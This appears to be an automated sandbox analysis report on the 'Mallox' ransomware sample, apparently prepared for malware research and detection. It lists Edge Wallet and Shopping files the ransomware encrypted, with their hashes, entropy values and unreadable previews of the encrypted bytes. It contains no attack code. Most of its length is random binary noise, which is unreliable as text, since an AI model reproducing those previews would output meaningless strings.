                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\shoppingfre.js.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):357883
                    Entropy (8bit):7.999507681282001
                    Encrypted:true
                    SSDEEP:6144:l7/rFR8W6x5aY3SbuPiEFQYJ8fbCNHlT2BcJHRXCn6AQ3RCv8eAYVhpq:9N6/d3iOFPJsiT2B4xXCn6j3RuHhA
                    MD5:F15270A02F932F10955810D4CAB0DBC9
                    SHA1:315CC3FE9DF2B2611869C75E64A01C86FDAABF5C
                    SHA-256:049E016648899355BD18F0125E77B70D127CFBCD0A3983118A4917D1C05A80E7
                    SHA-512:65FC182AA2A83E27D42B2C931A051DECD94DE5313550FDF07EE6B8F98F185073EDE0DEE6F71C07828055CC25CF5CEB1E495A05A4E0C0B99F0052DD1005F8F048
                    Malicious:true
                    Preview:........^....L!N.'k.__..j,r+.TbJWY..".@.^kkGc.._....t..7..P...w._...jm..q.P{h..Y..oA....Z`.V'..."r..+eq;.m!..JBl......b.....^.+."jU_.......hF.cn.i....n.......h.t... k..q....=.....A.?"....cv.B.A..Hs.u.l....~..?4..%f..~:L`........=........&@9.y...Jr.o/:J.....\9P..]....\gd0..b_"e....C....G.B.....X..k.H.+ve.[7..s..".F0_H?.B..iN,K..Rc}k<..........Y.(....GqO...H.D[.nP..Z...g../..aHd+d.Q.1.V..mfA.6*.F....-....|i.F.........M. ..X...2!..=.+.k...H..R/..7.U.u.....7Nz*..<..^..b.....W..Q..B.rm~T.....O......n.....^..O.:..u.w...R.:.4..>.<e..$........G^[>m...|Ft.X2t.._.(.x.3....gx.6..*.....g.(..;D.S$(V..g......l.P.].laB....o..n>.....r..Q..*..-...H@....o1?Bd.Q.]..N.+........H...8.2..*y#`...d.../...jsX..#@3?.Ae.G.S.\....+..G...n......Z..06..R...&.z......AB..k)#..WJd.E.q,....1.....R......."..h..W\.*R.`qx|..@V_w.G.."..[...>.A*..S..n.%;%..9..j.F.+...e.ST[...mb...#...C.f,8]U~j.x`0..TD..Y...!...1.R..q%.-N.a.t.0.,f.v.n....i.E.qnb..=z.0.......~...;]._...l.....C9$lW.Kn...

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Mini-Wallet\miniwallet.bundle.js.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):363023
                    Entropy (8bit):7.999607449284003
                    Encrypted:true
                    SSDEEP:6144:WiOFSfM4Dvn9dCa+00o3ysuf6086yow7HcDFxcnAbIevlPHuWBIw2fOOzZx7:/fM89dCY08mwrcDfbIivuXrOOzZx7
                    MD5:7CAE361A60064F3635265DCFF38788DA
                    SHA1:049DD80953EDEE600F8A86BE3F63DA75A9CA674B
                    SHA-256:1E111676FEE8BBE2DC1C822F9B9E5970E0E6601ED80CA0F7C99A28F6A92A43A4
                    SHA-512:18157C838B130BF1660E565ABA6F105B8DFA419CABAC583DE9DC1EC870CBA7E9A85A6EB0E643FA2BA857CF26D9ECFBF31A21750B753CC02595C7E30B92FB890D
                    Malicious:true
                    Preview:.7.@.I._.....s..y..}..2my.N.3s..J..W.pd........4...k.,U;.[..n..u=.|9....[.^.&.fA.W....K0U.....e..7{...J.`.........T$,.Z....rhi...6=.,_.q...."........~.]/...z.qc.2l=..:T/..h.S..+...0..={.*..H.9..S.c}.S....b`...*Q..[w. ...U..MrA.:.!U!.?.:H..L..o."-I...5..o...E.....Z.w<!]..{p.=.%..d].=....... (>..`..}z.HE.j...v..S6.jW#..G....,.m0...0...z.{.P0.x.Eu.Y!s..q.i.KlR<gZ....!.y.e...N..As..zQy<..<^...Iw....O............b.g.....44.,...;*...[.%.....u.O.fq(.d?.s_.^*m..s.k.L:C.."...?u5..*,..[...<V....D.....u;*;.k).-.l.{.y..:U..2q.P..D"d.7..*.....I.(......m.#.(=5(...VT.Je...3.......G}i.p.....=...g..22...1"...r.\J.{..V.e.n@.`.z.....[.0..?.T...7.4CE....G....~..Z..d{.:Kl"T...P..l..Q...5.'+.%-`..K...`.a...$..... .. .!c...?.y.+..:....XY..3W... +.....9.~. )v...^v..\..% K....U..N..5..yU..06.w7.^c+..\@}.q...CV5&.U.r....(.R.[B.x"..A......GAr.|...d..%....Y"".a.|...j{E |.z..a....1...B..../.D.o..s..#.z...o.I"...pP..N$[......n....a..t...U."\b..&8.e..G.O.....|a..........

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Notification\notification.bundle.js.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):493214
                    Entropy (8bit):7.999614093170356
                    Encrypted:true
                    SSDEEP:12288:DO+uUYzbzKUhqHNbB7XHiotRv0tJwCPUtzwJP9:DmBzbzKUYHCotGLwCT9
                    MD5:2636521EAC00C66FB2BAB1ADDC13E01D
                    SHA1:D3BE42B4D606C3E9B30CDEFF9F665B2DF661A5AE
                    SHA-256:45309114DF8DDAADD06E858BFA6CA6E030F65A926AF267757258AC9EAE74A2EC
                    SHA-512:876F7553D74E7473C9F6A5C712C12AA60C84DA9B0F9209B7E55FA379B678430519E214FE17725E15474C956D9A84ECE845B8CECD0DE2509332024121351CE0C4
                    Malicious:true
                    Preview:...'o..E.BP..?......B&lR9.JQ.mW.>....$..]?A.9....`^7..I..".n..F,yH.......'..B...+..../.b$.w.t...!mZ..Z.p@...z....p}l..?.m..#.%.=..-.3a.:.....#/..+.b.../....r.m....9..-]..+.q..1.v9"J{G..T._#yd.K|..`...HS...['...{.n,.Y.W!Y..X.....-8....z.....u....F.~gY.i.....:.. B.O..w`.".J_.(.#RS.0\E)..U3.G.*S...|mwv..A.2%.Y8%;.p.p..PF^.....Z%jm..d.Ad..~.{..\.>g.NyH...1.p;....}.....W...k..,p......5>....G.:...5i.[..'..:..<..f.....r......Z]..>...a@S.U.|.Yc.&.....P...a@........b./.Oz6..z..c%.@.b....T&...A...q\.,....ID(........iyj.X7&.A..'.......:.S........./WQ...1.c.@.0..bc.zz.9..=M.%..'.J.y8...|........btL...-.i1....../...u?.0..@3V)....w.S..3.(gG....LBZ.'....X.U-..a..x.){.....+,"..9tzz.'..:......l..[..G.....C.M@..2....23.Q.I.....i...-6.....y...d..\nq...)...5..7......K.q...w4U.01S.zKR.O....T.r...(.(4..S<......avW}..}.!.n..'&..EB..z.).j4M.......H....y...O..........2~.z.....}..........N.bj.;z'A.._}....'.r.9.N.2..z...B.X.......H.Gm......<.3(....%>.^m...DQ.F.

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Notification\notification_fast.bundle.js.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):329798
                    Entropy (8bit):7.999464777269974
                    Encrypted:true
                    SSDEEP:6144:9wxBUJ/foCwXrWSMJ3gWHSL5RWxVW02eeKmNc7i64G0v:+bW/fniImWHSL5RG8eeKmNc+HD
                    MD5:1762CEFCD6A8F41FD673FCCAA5226658
                    SHA1:ED4ADD22B8E55FA07591532D4297967992CC0454
                    SHA-256:94C35B11B28C6DEA8D458E6B4B055D5BE0C538645E4EC57366AEB098FF7A3432
                    SHA-512:2FA0DC806DC96D1CF5F1330F7A8B790D9EA6C9BBCCDF73C7122ED426E1D5AD2A483FE47B3ABBC0470E556FD7189E2CD1716394A3FEFBF178457F2F36A7F5122B
                    Malicious:true
                    Preview:H..~.|..eB..5..Z.hk.O.+. ..F.16;8;....y....L[.0,E./...y...P'-.s....^.pI.Mg/........y.7.2.@.3/.l!kk...W...o.....!..S.......'Kr.B..Fw..fF...q.....+....../[.b.*...........LVx.... ...[...L..e.(.e....tm.i.i..."2o....[.!....9....7..lE0"w.E..2..J/.....m...kk...C..wI/....@u..h."=.....se..T.....X...Rm{......0 ..p.../...5......b......z.p.....S#.5>........Z@..MQ0U(....Z.......3...ZL..om....c.>.}...st.<..2....8g...7...{[....s.4.w..1H..K.h.^.......x.i........{OK.q.K....T..fj..u."......t,...M..t.... .k.(....%j.*a.4e.1]..S ..W<......,.).h.>..I...B..|.......5...*>Ea._...m.._......3.8..&v.........4.j.I..x.y..i....1..d....A....u@.bI....!..O.b....x.g.....e.FA..S.7.3..8YqL}.....p..q....................G......2..h.'...../..,..e?J........2.Ps....C..G[......>.yae....~9..sg....F..+k.>...K.M.*.}.!.....!..4@iy~.L.kOn..2w.Q..+..8.V_..J|r...d@..q;....=]../..,q......[...An\...ui..k..B.^..g..# ..H..R].f.m.T......%CgsP.... .....:.Bh...d...A..r.^.?.%.......t.KIn..

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Tokenized-Card\tokenized-card.bundle.js.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):552357
                    Entropy (8bit):7.999665531052061
                    Encrypted:true
                    SSDEEP:12288:uGknAY4g6Kfukk3DckWBlsYkMMsLKJ+wNIIB7hL/zOup3:uDugLa3wXBiYkMpASo/zOup3
                    MD5:BA21A5290004632D82997E25628339D9
                    SHA1:A1632B82AA109162BB40B432C628585F4BD19AED
                    SHA-256:13385B5BC6AD40B9096CCCBEB286E04CDD759856331DDC5733CDF26A0E73EADC
                    SHA-512:286B0D00E150214EB9131005B1A4AE85349B1BF87F6CF1A82DDFB41B04E66417FE4354D9CEB52C3EB295C4DDFB76147BB3617A63C3DE657D4951EB52426A1F35
                    Malicious:true
                    Preview:...L.R.FoZ4L.*..._.....U.?W..I.r.8.mf......`P...`h..".K ....../...xT.wM)qh..7.w......7.lM$..5......=>..S&B..CG>0y.oR..i...<.%....^.h5|...yW.]6w..15w.0.G.dIz..,..6.0....]2..&.b.DF\.:.........hN.....rr#?.dWB.$..)...._..z.B.."*.ww...7....i..2._.._.V...2."..<.L3.k..PL...D&..4=~S.....dA..x..R.c0 YMk..,=.6"....M..6.%..N.u.`E.........9,.=SQY..T(.....O..*....D!g..p.R.DR...{v....J.........#..}c[.g...y.<.6..'^o...a.w..}......TK.>.jc?....p.u.t...7.;..T.]..d...l...'....%.t.*%.Z.D.9.]......<.l7 .re..+....f..d~.\A....."...Ox.$p'Kq......O.(.S.b...7OZp..F5.*:....$....3.8...@.3...#._kd27._+N.|.....$.G?.......5..........0.a.%2....<tI...Y...2..`....W.}.........K....p?..\..?........5.{.-.ky..4/.V..'.%.....N`@._...j^.AX~..'.Ck.m..A...i....#........+....6a=&...{.....8..=}..,T.*\..."x...b*O...J..P.....S..bU.`._.'S.E..j.."..m+C2_..... ..(.M..{......?A...."......q1...`h.....d&.]AQF#...4.r..Y.t...{./z...]($p@...XR.g[-.Yw.{.............f.@;..:...HT.9.... ..!/.a..T...U0.M..

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Wallet-Checkout\load-ec-i18n.bundle.js.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):16272
                    Entropy (8bit):7.989082227452141
                    Encrypted:false
                    SSDEEP:384:NXAn1IAX6yf9NcwdGkJJILA5nOUvzsmQCO8kLWZbt:hAn1IAKyVOMxJJsA5OGXQCXH
                    MD5:8E49BF2987AECA44EB09B42E0162F1E7
                    SHA1:A253E31E2A79D3BA64B4869F20B7E28D6AE5A263
                    SHA-256:E06F0A506D6E9CD4AEB26D02BC0751BC9230E68783351764DFAA972AE41DFAD5
                    SHA-512:B824FE5681BA697E6FC456BFA298EE72B4EAEA74F1161DED7A2E9606C9F5EABB6DF4026520404DD93BB50829B7D2F4BB25E0725F8D4D32734D5ED6760D1F3D3C
                    Malicious:false
                    Preview:...*.y........5t}'O.n..0.w.My.&..`.>..z2.8...)...4..x.-.3...r..C...j8..=..="E(.}..(zq....Y|..q.$(.U....{.).Q*..Jcq....0.a..4..U....vK.Cv..M.h.T..mm.%~7.../nS...*d...._.OBI.../.D/........jM..E...,{.=..r..O...q...5.!?....jtGk#.Y.P.5.T..._+.)..v.s.....d.F.L.>..]!g8Z::.$..Gy#]<;..g.H.P3..b.c..P.b.0.Jg.=q8.=.....W..,."%.z._.[).N^...m...4^l.}...x]M...V...V{V..U).=...M;..P.M..!.......[2E.)."S......`.b..{"..Te...E...{.....10..#.{.]j:..#.@#4pv.b.j.c0..&.-O....H.....'..V..~..V..+..Dc._$...{..rl...xp.T.9....c.\!Mc...../..t.`',c.C.=..........-...Z..1.....`_...e.0..S...W...Q.$.Y.^.(l.oJ.........\.....k~C.>.XU.[t...M?...!..Yi.V.l.|../......X..:...\..v.5o.,.|...,n#;.....v.t..g.J...]..y....B..~...F.i6T6.......NY..e.......z$.>..~.........H.F7}.K..H....?....{.^.....h,...I...].|G,.H......ih...4.eUDSg...Q..1>.9.s..?....^.~.U..cA.STD...7...v..."..r._a..X...(E...@G.C..^.3....K...m..=...b...VQA...&O)..i^.C.....QS.7O..91j....f:F.=0...;.3i..A.0&..o........c.S6$.@

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Wallet-Checkout\wallet-drawer.bundle.js.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:PGP Secret Sub-key -
                    Category:dropped
                    Size (bytes):1394771
                    Entropy (8bit):7.999878735920271
                    Encrypted:true
                    SSDEEP:24576:ShxAGBUKraarPJkIaeJ9uYKX05KkUx8f2yIKnoG5uYsnyWf/av38:av2KBPis9u9oUm39Mygf
                    MD5:0B9748BF2CCA5F56EBC63EBAF6ED6029
                    SHA1:4DA8812D598681FFB42645136A3C8BC550C084DD
                    SHA-256:FAADD979613743A23A1CA670ACDA70C1E7125E901119B3CAA10A62E1536F113F
                    SHA-512:E9D806A7B48D42FE3B2CBBF61497F484965EC3F8E4A23BAB99E5AE8051AA789B4F5D7803F26177985F4C6928EDEF3B72AF3F9662AC1ABBC4D45230F28E0C8A41
                    Malicious:true
                    Preview:..*.../.......e.t...".A....g....K>E...ELRN...E.\A..2..j~...$......e..}.y\k|.=..iVV........Z.<...q.v......GY.2+...R..G..(%n....#.'.}O}.{.j.........NOa...n...@..s.6...y....=........J...m...eO""p.lM..g!......^.3.<{.a.......R..K.5~..2..H../.nE..YA..}...Fv..i.h...6.^.....;.....4Y{..."2.{.......(..DZ..U>..B....$k...O.(...SD...Q.&.}.&.Q....n.[J.;I."SS30..LV.&<.......?.#v.&...,kM.4..-/._.....1.SP....|.v....I.1%.......x.z..x...@w....Z.....Um.E{.d\.....U8.}bh).O..S.CE-..@C.u`..}..s{...p......8...\.......x....].0......K.f........~ch.]/...E.'.^...M.T..._E_~.2..D.e?..v.jKh.X.?:d..../...Uo...r?..v.:....f..L..@.....n.I.M(..?p._...q.....{!...n.K~1`.?..Ww ....L,Z........I.A...L...8...V.*. ....P..F..q.;.....k.P>n......X.>o...0.+.....z......U....\m..4.4.j......X.6.f\...[\8....;^;.7.m.(H......m[. .&.$.v.N..z..l..eo..n.N....D5.c....l([...M...BU..%....P...sA(J..e........=.....=..x...w....L.D.......{.;._.{...z..T.../...y%.e.`.Y.|ZB...1]Zv.Iq70Y@*..".4I.

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\bnpl\bnpl.bundle.js.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):843001
                    Entropy (8bit):7.999780180315465
                    Encrypted:true
                    SSDEEP:12288:oXYMkoPkKoW1UeozV8O8FeJmJlbdFiOknNYv7G8+eCVY+UAIpfRSaWrIMw5MJBUb:obYWKzV8O6/enNAgLC+NSSXlPUb
                    MD5:BB332D22C53BDE9209F2FB3C2054F34E
                    SHA1:EF2519D2FBC3E58F0B0FEE26261B8D700A1B3593
                    SHA-256:C7C74C48641EE59505E5DB740D1228C19B8D9C6AD96CF601631929595F3D859B
                    SHA-512:87F1B789A346978E5F18AAA45FD068A72F432EF7B71B617AEFBFC66506917B7B822ED060F7935BA935C0A4F364171A8CDC39F555DD45B19A0F334D09FA28FA3A
                    Malicious:true
                    Preview:..y.h....l....`..a>.S.-..P.IG..V.....*f..@..|.S.a.N...i..5..}q.*...b.).9.?b..5.T..4..\.w..h.o....K....&.......+6."...1..KD..f.]...._.?........F..=b\E2S.mE/..Un.+.w+j.\v.y....u..#5...8.Kh.!...n...~4.;..".....>...e^.....B8w...S~.X..z...F.i......$.(.<..G....Hm...zc.............)....l.@)..W.z...:.h..$C...i.....C$...F..:z.(B<.ZeC._....R{`=...:.4...Q. tE.-..\.....&..Q..N.j.@.)..F................4...j......./rH.a .:...I....L%.c#...+)~&b&'.a.b.*..$.;=-G.S.?....a'T....We...M.l...r.{Z.r...y.f.:a+"..t.%..s..).F.{.QvT.....g n.:.Q.. 7.(.....\....a..;..~65.4TB..-.{.....5....@.d|..0...Q.N.g.M....U*......w..6.......Uu....'%.x.w...b.......8S..{N)...3...p6.........1..GM.......U...&.0@j..../..3.....EAo...N.....7HN..S.W..j.3...$\.V1.....w5Jh...)....|)X(<./...2..:.C......2..[x#...X....*Y.D.X..]...N...otR........`.....h}..O9..Lp7..|..h'...L?7.zL*.9.j.... ..m...3v[...u(i..;t.d.....v:E....3.....e.<<.B..E......p2^...p.JL|.;.c....lvJ.Z -...yf.@...|.y3t...T"..w...lg[!.X.

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\bnpl_driver.js.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):11650
                    Entropy (8bit):7.983205948758681
                    Encrypted:false
                    SSDEEP:192:bL5GeSiSYSn+vVv1x2KkfOP0AKd1d08EAWB+v8xh0yTtk9IPHeouRWQ91+6AEE1I:bLAeSPoVv1x2rMk/m5AWBPvPtk+vwRh3
                    MD5:BBE919348E87210B8130504F5B9E918C
                    SHA1:ADC103AF8B1E93A81DB23433D5ECE7D10FD32999
                    SHA-256:DAF751E3B8ABF34C80A97A4203051E5BB5775E5923CB255487A19DE0758D6F1D
                    SHA-512:3453E97C8814145C3F5447D9D74E93CCAD8B91665990D9366FF252748AFF0881608B991B16FD447BF4AE2DCF13219121C02914F88702387CD070DE87325195B2
                    Malicious:false
                    Preview:a..v...C.t~....."@/~........%.+R..;v.M..".R...8w5.....+..y...#..-q..K..U....;8..6........Z.f....j..o3.~.P8.5..+...-V......8{..+R..AJ.........B../.S&..C\.|..L.j^[3...>.....p]IA.F ..Dp..u.. ..f.P?.f.W...h..s|......_B0..=.c{...].*...E@.h.]...o.T....W.R)&:.`...._BV.L.h....#...:.ovg.J.M..f....I...".kn....r.w..~tX...A.r.Y.e....vlh...3.+A.sQ..)...] ...w.. .2L.XCK.....^2.d....Y.....[...k9.#l$O.'.NqW..'b\G...6..#...yPX.|(6..|-.ZC..ybN..hn..]F..OC.;...i..C.&.d.._T."....(l..RT...=N.w.`.-08....h1..o_..f.y.)......P.G...Z.<P.4....*...Y....o....-X.u.B..... ...P.ZH.9m...GU."....&.8.jC.Eu.O...C...B.T. 3...x.r.o.5]../.e......j.G("W8...6h../..@X.d..o.(^...C..S\.4l...f R.........,.@iN..cmR...uJ.........3.:.P.v..,o..E#..OO...N..F....2.I..(...)7I...G....j...@j..)U...A..z..c/V...K..`....D_...P#...~.W...M.xIH.X...:(...L.s...f....].9...3...O...aAH.&....r..`G...i.5.\9.....Il..|..&.B$.6..YQ.v..X.....6Hwe.9y...,A.~]#...).r.c.m...*.I..v...H.-kT.V.q.d.."....

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\driver-signature.txt.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:OpenPGP Public Key
                    Category:dropped
                    Size (bytes):14451
                    Entropy (8bit):7.986712005961189
                    Encrypted:false
                    SSDEEP:384:/BJepEp6hgMlGlS4cAyPvMLqwo0ykT672aFbklc:2C63+30yOp
                    MD5:9A73AEB8C6ED04666B84FE2BD9E66130
                    SHA1:CFBEAC9E7AEA1D3BBCF107498CD4E23E0547BBC6
                    SHA-256:F1F5BCCE83AFA8EDD5212EDD6C2A0BE68207958804E78A62F37CED9CB7B140ED
                    SHA-512:24CD4853CDBD98E1992E7299BAE7765BF0FAC1224F32F21DCBFC31EB35D1FEED604D6B090B3FFF5E4190AE6FDA5471479BF02C2652DF94862BC016A56067BA8C
                    Malicious:false
                    Preview:..........|..|.2..D.{.I...).[u..RH.*.....Vx@.!E.&...?..*..n@.87.@%(.-.I.....*..Dq=B..<(4....[....T....Ja....)..0...H..o..xI.bK..q.Q3..^i\.....,....h..~..>.d=..-|=6.F...;...6.K.........7..w.C...b.W.e.w...N.60.n..._t.S).{..o..Uw........[w. ..`....}>+^....J..3....~..n....\{L..7%.u.K.G.Z....hD.....6b...(_.EY.....^a.+.#.....]Sf./c.~(.>.......K....fFR......l&..M<=.ClB_.....-7..r...'.v.f....z...]..G.DfE..\..S..~...\.E6.H.......X.g..w....\c..R..L....8@3\Q.......C...RA.-.=.c.o....X...a".....:Zx..e....362.....-S..t..0...y.'/....j...G..O(1..N........../VL.PUW.`..~n.~gn..CB.w.......FNy>.:.Y....?c...!.~LB./4."q.F`I..sF..:.#.k.w....,^"...9k.....R...oh...7.A..by..L.<.A'...&.....Wd.o.AfmR......K.Z.0.:%..&.xVJ.t.r\..r*C..d...t...~.\3.d}.m.}.....(.A.Bx..t..M..u.....L.T...R..%v...L6xg..+...`..asb...F.....:....`/...,....*.K\$.....^W../U...l.1e.. ...SMU......u!Vl.J9..".....A+.].MD.LTC.e+.&`.}.(U3..P.^.:..ro..>g...)..$2;rk&......37.p....M.s~r..

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\edge_driver.js.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1946134
                    Entropy (8bit):7.999918889315575
                    Encrypted:true
                    SSDEEP:49152:JveZpNGNZxCFg18h4bGHtQnPpbYwuVvLE4vB4cKNO:iNGNqGaYqQnPpbYBY4BCO
                    MD5:F15AE866EB952A8DB36F711D365AE481
                    SHA1:FA5A6C06CD44CF6321FABAEA3730B927D54ACF43
                    SHA-256:EDC320996CB4F2B5E476A7D9CC8E740D08FAD10F5EBE7D02DF744524C0F68141
                    SHA-512:92161CE4DA361D1EE602DB6F39DB8EC81877A07B9FB7DB88A4BE183B50DF403A14CE7A42763C06FB19A18E98ABDEC833174BABB6BF7DC79E1EE5F7198D4406A7
                    Malicious:true
                    Preview:.KSy...V9O^.w...k..AT.3_.h...^....R!..l.8..0nDB8....nvA8..R..Z.v&..f}.5..G....mB.0.!.G. ..#+.Gv...$...JUt...N.....G24...Le....LeKGzJ&.F..A.....G...L.?P..|sclE........Nf$F!.....e..a.+..:.q3tSC4...Ub).LS....-].J.-q.w'.)..D.uO.&V..B;..#C..._.=P/~..A.]t...k...:...`.E....n@Z!+...<......*3.k.;...h...s....c.x@.....cz...J......s..JO...&X..[t+)...Cg...;.Z.m.iL%.:cT.z'..c.....S.......9.....:.&..S.qA...lLC.i.m=.J. $.P.0.oI2...d.....F.*iv.(.4...5.:.<C...un4..7.......v...!.h<A.t..... 8..lD..[JQ .[N.....>....fmF~W.....Y.z.%:K.....:xT.-B...bU.......`...%..w%%..%7..]...\.e.....+..%.^,J......i..,^T....(.F/c&.......Mb.r.......s.'.;.`.I.w.....w..y....=.M...V...g7/......u.5.E| ..|.....v4..8.....:...l.....7|.r|:Q.y.-.H..IT..^.a. ..<.?..H..\...2...b..z.Z.33*_.6....e.75..;<E6E.../[......C.0..{.....R.-.d....v>.S...9.8.>...k...iM1.E...S.d.n?~..".~......G.d...8Bl..[P..ID5...+.fO......8..B[~&'~...k.b..hW.jD.V76...r......Sb./..T.......}.......i....._...G..*6..........X..

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\ar\strings.json.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):18403
                    Entropy (8bit):7.9894086455801565
                    Encrypted:false
                    SSDEEP:384:MA6WEA4HsRduiUbzu4ZVm/zj2vJwXgfG23gkaMWb5+Zlf7JU4LyMv3KiYTC:B6Hund4ZVm/X2vJDfbKE3+TC
                    MD5:4F40759911FEF20C6BBDC81310037DE7
                    SHA1:5B8BA756905316B82E270A684D9908802F2A37AE
                    SHA-256:B28201684F95624938B6609EF099023BB6DA75BE78D21C4EA2DB59C006278987
                    SHA-512:33F886D9CF2C736A39A6CE7CF4690272BEDDD77F783314129CD475882799299F66815EB5FD4822C45FF722C11F51722670C75C075EAF48B4AF4CF4888078B6C5
                    Malicious:false
                    Preview:...vX.jw<.y....Vl..`R3a..c.0g67..4..o7`..../..y.=W.&..C..k.<z...E..V.....IZT..j.m....N.%.(..5.Nt..y...`..]..K7...9..\..@..4O.L.'$...2.e..Ae....8...F.lJt...2%:g....i"j.F\...z..W.@..h....[.E..Ru|L'z.*5..+.. ..E..N.I.uAq.).......G..-z4...F.......9.=........6..y..sQ.Zn...6....B..%....r4.z../.|.Me.j.V.$.@.D..^7...K.\..p....'...(..\.s.S..t..d...z.qG.g.O...pc..8......Xe..6H.4.N..D.Z....$......[..?.d.J.Z~R.n.}&F.f.A..].......[.k.~L.pQ....;..R..p...c...A......./...t..H.'......(...L(..3'......F.....t.../.o1..z.m*...g..N...H..A..:?.pl-....X.KZ%.Eq.]ry.s..|..}....-...z....n........^..............n....a...[...`...90..*\.....+..ct.[......6/.|y:2...9p`.g.`......]..._U..B~r..}....=.S1.!...]H..).....W5O..L=W......aoV.....s}.....S)/.N}b-..0...O.#y.#.6..Ji....k.........C4.I...*.}J...mr.?,...:.sX.x:.u...WU.t.Q4y..f."............W.r.`8Y#/Zb...rl.s......<..xP.;s... ....=. .....?8.DN..3R...c-.aI...#yd...`..Y......P{T...om.5.....[..hVS....B.3M.RB.I.[N

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\de\strings.json.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):15109
                    Entropy (8bit):7.9861275830347624
                    Encrypted:false
                    SSDEEP:192:iIJS3nlYdpfpdWvsX5R46ho1msEj58/e396CfFEpbilP5yG4IoyMiaCQC8DXX4MC:zglApdXR46ympFD6CGMyGxoyHQlHZwuY
                    MD5:7BF1268FAA4DB4EF0DE6C48A1F71F135
                    SHA1:8803F9723E4BFA9CC422B8D9099596114EC7E07A
                    SHA-256:4A7CC872068C0F381BA17D70F28D25967543521797FD72A255B4E8BBD00CB59E
                    SHA-512:7EF6CBFC4CB4436F068825CA3CF9C05FB2411A8C2E374E66CBD5978537513C2698D0A777C6BBFFF24DB5F3B6625EFBA58954829AB0079F29FC7C000EB503CDA3
                    Malicious:false
                    Preview:<.J....*.P.z-.y....w.f..&I...*.........G.g.?.i@.6.TBu\.F.GQ...l.).....`v...Kv......6.x....T.....l........o.D...6...J..O..u..L....a.._I.u...^l.=...c~`."....[.`Y...t..K.(.....f..q.&.....uUmC3..@.H.:r..!PG.-.9...pW)(...../.-._....kn.Zd..,.c.Q....6tZ...f.h.]c...urS...I.....8}....=...S.|g..X.ZI.T.J.g..;O....!...'..U..]....7.. e..F..Q..`#...........Q@.7.!..{.wx.p.x....k....B..Z3...S...}....Sw..Q.+@E./.~r.N...a<..S.p.(......B..&.]..._.../....V...$.|n8.>.9....if..Iu....6.+.k./.o.... .gO=7......M..DK.IXM(K[3.xn..v.D'..!...IP.K......k.\:\..P.....(\....E.|.ZO....a#,..f..f.2=l%.,..H.)@'H...z.F..(.2.<;..l..~......31mJp.L6.x.o,.#A.p.B......)...{.d/....K.....<.....h%......|..Up....O....Bz..&n.HE.7[:a;.r....7..Sd..._@.Hl7~.......qJ5.X.......kC...kV.!kh.....P."..Q.H...i...$...A...l.....q!...P..'..[.(.=6z..g0...e.R..=Pd.].....)..y@...h..3.;b{.*.|..mK.w...s.GD}S.......+...`.29F.s...|...a....S.............>.=<R%qK...O8.e{P....].......Y..fl.*.).&Q

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\en-GB\strings.json.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):13298
                    Entropy (8bit):7.98655694390807
                    Encrypted:false
                    SSDEEP:384:wq6hy2kyNIgjZZiqAUXhFk9zbGodL+snNRj6k5qFqU2Yf:wq72kyNgLUXhF2zbGoBnnj68qHh
                    MD5:C6EC8E8578321026860BA0A1E2E3DD6E
                    SHA1:0FF57143A9BCB7DDBE88E7742C18E20B819512F6
                    SHA-256:6C749ACB23F0C8162E8E132061EA431012DA6C15D2AC9FF5BBF9043547B9E1CE
